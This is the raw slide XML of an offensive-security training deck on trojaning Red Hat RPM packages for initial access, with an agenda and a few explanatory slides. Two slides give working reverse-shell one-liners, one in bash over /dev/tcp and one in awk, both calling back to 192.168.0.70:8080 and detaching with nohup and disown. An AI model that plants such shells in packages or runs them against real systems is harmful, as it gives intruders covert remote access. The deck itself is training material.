    <dgm:cxn modelId="{A5F9301B-A3CD-4AE5-92B3-F49FAAB77D8B}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{7CED1E0A-76CA-4294-8D25-9348075726F3}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{77D2BF42-00B1-4A77-AAF4-7B35B6065279}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{46AE9617-27F9-434F-86DF-BDB2AC5E0B97}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{08EA2DD6-DB58-41CF-AF1F-6CFA6A604002}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{001A4110-FDD4-4E9E-B713-D13528031ADF}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{970B7E0E-C6FD-4C3F-904F-8E7BDE77E00D}" type="presParOf" srcId="{001A4110-FDD4-4E9E-B713-D13528031ADF}" destId="{B4A013C4-F35E-4470-8AAC-C26D1E400E5C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{03F9B704-0BBE-4C1F-9ECD-685C38BAD1E9}" type="presParOf" srcId="{001A4110-FDD4-4E9E-B713-D13528031ADF}" destId="{13170697-3FB5-4433-8A9C-311E58943FA9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CC34193D-5FF6-4D5E-8F0B-239A47B8DD47}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{3B6E7F2D-C76E-4EFE-BE65-49FF9E84F2A7}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{66C866A1-02A9-4008-92A7-B3F945D19726}" type="presParOf" srcId="{0D1F4556-3674-450F-9144-74CA57B2BF12}" destId="{44AA433A-56FF-4851-8F4D-4E2B56041CE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6BC86-DB5C-4A72-8F5B-C0E1F60797F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="446990"/>
          <a:ext cx="6171948"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4AB940-4A84-4754-8E82-041B4A932EA5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308597" y="92750"/>
          <a:ext cx="4320363"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Overview of RPM installation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="343182" y="127335"/>
        <a:ext cx="4251193" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9856F480-59A0-4C90-B7C9-E6EBF420C3A6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1535630"/>
          <a:ext cx="6171948" cy="604800"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="lt1">
            <a:alpha val="90000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="-101803"/>
              <a:satOff val="-873"/>
              <a:lumOff val="-5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02F50E-4A12-4D0F-B75A-92C00D7CB633}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308597" y="1181390"/>
          <a:ext cx="4320363" cy="708480"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-101803"/>
            <a:satOff val="-873"/>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dirty="0"/>
            <a:t>Components of RPM package</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="343182" y="1215975"/>
        <a:ext cx="4251193" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3064F9D5-0F57-470F-AF26-5C29C8F66447}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2624270"/>
          <a:ext cx="6171948" cy="604800"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="lt1">
            <a:alpha val="90000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="-203606"/>
              <a:satOff val="-1745"/>
              <a:lumOff val="-115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1981C-9058-4E5E-918F-91B2EDA979C2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308597" y="2270030"/>
          <a:ext cx="4320363" cy="708480"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-203606"/>
            <a:satOff val="-1745"/>
            <a:lumOff val="-1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How to Trojan an RPM</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="343182" y="2304615"/>
        <a:ext cx="4251193" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7CED1E0A-76CA-4294-8D25-9348075726F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3712909"/>
          <a:ext cx="6171948" cy="604800"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="lt1">
            <a:alpha val="90000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="-305410"/>
              <a:satOff val="-2618"/>
              <a:lumOff val="-1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711570-4645-4DDF-9D1B-D1E7F7CEFD52}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308597" y="3358670"/>
          <a:ext cx="4320363" cy="708480"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-305410"/>
            <a:satOff val="-2618"/>
            <a:lumOff val="-1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dirty="0"/>
            <a:t>Persistent Payloads</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="343182" y="3393255"/>
        <a:ext cx="4251193" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{44AA433A-56FF-4851-8F4D-4E2B56041CE1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4801549"/>
          <a:ext cx="6171948" cy="604800"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="lt1">
            <a:alpha val="90000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="-407213"/>
              <a:satOff val="-3490"/>
              <a:lumOff val="-2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170697-3FB5-4433-8A9C-311E58943FA9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="308597" y="4447309"/>
          <a:ext cx="4320363" cy="708480"/>
        </a:xfrm>
        <a:prstGeom prst="roundRec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Putting it all together</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="343182" y="4481894"/>
        <a:ext cx="425119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3AE81-E4AA-4EA6-835E-91524A48F28C}"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9791D-FAE8-4642-B241-5CEAC412F78E}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389429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another training session of Offensive Security Tactics for Linux Professionals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6C29791D-FAE8-4642-B241-5CEAC412F78E}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312982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29791D-FAE8-4642-B241-5CEAC412F78E}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58945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firstly let’s talk a little about an RPM. An RPM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Redhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Package Manager) is a package which is compatible with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Redhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and CentOS systems. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6C29791D-FAE8-4642-B241-5CEAC412F78E}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5683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776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692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41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909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9541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73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7864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706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9916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23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560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4/7/2022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6929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C8876D-30EA-4E6D-A641-91F2C90D789B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="4588" r="6523"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7662" y="-3"/>
            <a:ext cx="12192001" cy="6858001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">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75CF9-BD83-489B-9DC2-89FCEC127D0C}"/>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Gaining initial access: Trojan RPM Packages</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01AF50E2-9FAC-4D60-98A0-6FEC22A36A38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8712865" y="1447799"/>
            <a:ext cx="2368905" cy="4076699"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Offensive Security Tactics for Linux Professionals</a:t>
            </a:r>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1 explained</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 No hang up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Disown – Detach from parent process preventing the process to be frozen up.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263468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2 – Bash reverse shell</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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nohup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/192.168.0.70/8080 0&gt;&amp;1 &amp; disown; exit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239003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2 – Bash reverse shell</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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nohup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/192.168.0.70/8080 0&gt;&amp;1 &amp; disown; exit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317714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3 – Awk one liner</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awk 'BEGIN {s = "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>inet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/0/192.168.0.70/8080"; while(42) { do{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> "shell&gt;" |&amp; s; s |&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> c; if(c){ while ((c |&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) &gt; 0) print $0 |&amp; s; close(c); } } while(c != "exit") close(s); }}' &gt; /dev/null 2&gt;&amp;1 &amp; disown; exit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104959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6D84-9518-4927-A006-581DF5AA232B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Perhaps an embedded video which will show the target downloading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>the payload.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49581CAF-5667-4411-824B-725299B6256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12926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7788-6DE0-4921-98F1-51BC6CFBB140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Copyright permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F28F9C1-B65D-46CF-90DE-429144A62CC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Copyright 2022 AQEEB HUSSAIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Permission is hereby granted, free of charge, to any person obtaining a copy of this documentation and associated documentation files (the "Software"), to deal in the training course without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the training course, and to permit persons to whom the training course is furnished to do so, subject to the following conditions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"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29515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61426-7251-400E-8B31-C5E7B9E93663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695324" y="901701"/>
            <a:ext cx="3914776" cy="3977269"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14"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FB648D2E-DEB7-470A-AAE2-B2B3B8A2B8EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1004164684"/>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1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B067-725C-49BA-B0CA-2D52CE9D328C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Overview of RPM installation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{245A544A-EBCC-49A6-9DB5-79D0B97373ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>RPM is the CentOS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Redhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> package manager and structure of Linux package which is supported by these types of Linux Distributions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>RPM packages can be installed as standalone packages which contain all source code for the program, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>makefiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> including other components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>RPM requires root privileges to run therefore compromise of a target via the RPM route it is possible to</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130628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D499-02DC-4213-BC10-8D793ADE1060}"/>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dirty="0"/>
              <a:t>Components of an RPM package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Graphic 6" descr="Gears">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85B8032-3294-4FA1-86F3-F2E8B3D0A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955" y="723900"/>
            <a:ext cx="3466090" cy="3466090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22"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1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143A-959F-48C4-92F9-5E12A36B0014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Fancy diagram goes in this slide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28880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EE7-3C4F-498C-A237-CB6C326142F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Persistent/Automated Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
